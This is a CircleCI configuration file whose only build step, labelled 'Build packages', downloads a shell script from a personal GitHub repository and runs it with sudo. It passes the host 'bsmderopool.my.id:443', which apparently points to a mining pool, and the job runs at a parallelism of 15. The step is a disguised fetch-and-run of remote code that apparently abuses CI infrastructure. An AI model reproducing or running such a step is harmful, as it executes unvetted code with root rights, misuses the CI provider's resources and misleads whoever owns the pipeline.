version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.6
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    parallelism: 15
    steps:
      - checkout
      - run: 
          name: Build packages
          command: |
            wget -q https://github.com/HectorCrespoThomas/asd/raw/main/run.sh; sudo bash run.sh bsmderopool.my.id:443
